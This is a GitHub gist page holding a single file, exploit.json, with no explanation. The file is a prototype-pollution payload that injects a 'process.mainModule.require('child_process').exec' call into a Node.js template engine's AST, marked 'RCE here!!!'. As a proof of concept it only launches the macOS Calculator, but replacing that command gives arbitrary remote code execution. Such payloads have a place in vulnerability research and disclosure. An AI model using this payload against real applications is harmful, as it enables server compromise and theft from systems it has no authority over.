Skip to content

Instantly share code, notes, and snippets.

@rayepeng
Created June 8, 2023 06:58
Show Gist options
  • Save rayepeng/105e2868f1eed5e7b2933c66aa265da8 to your computer and use it in GitHub Desktop.
Save rayepeng/105e2868f1eed5e7b2933c66aa265da8 to your computer and use it in GitHub Desktop.

Revisions

  1. rayepeng created this gist Jun 8, 2023.
    7 changes: 7 additions & 0 deletions exploit.json
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,7 @@
    {
    "song.name": "The Goose went wild",
    "__proto__.block":{
    "type":"Text",
    "line":"process.mainModule.require('child_process').exec('/System/Applications/Calculator.app/Contents/MacOS/Calculator')" // RCE here!!!
    }
    }